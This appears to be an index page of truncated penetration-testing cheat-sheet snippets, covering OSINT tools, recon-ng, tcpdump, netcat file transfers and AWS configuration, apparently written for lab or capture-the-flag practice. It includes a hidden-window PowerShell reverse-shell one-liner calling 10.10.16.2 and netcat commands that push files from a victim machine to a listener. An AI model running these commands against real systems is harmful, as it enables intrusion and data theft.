Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...

Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Transfer File Output the exit of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...

AWS Configuration How to configure aws to get access to its functions: ❯ aws configure AWS Access Key ID [****************6TDC]: AQLA5M37BDN6FJP76TDCAWS Secret Access Key [****************Fo1A]: ...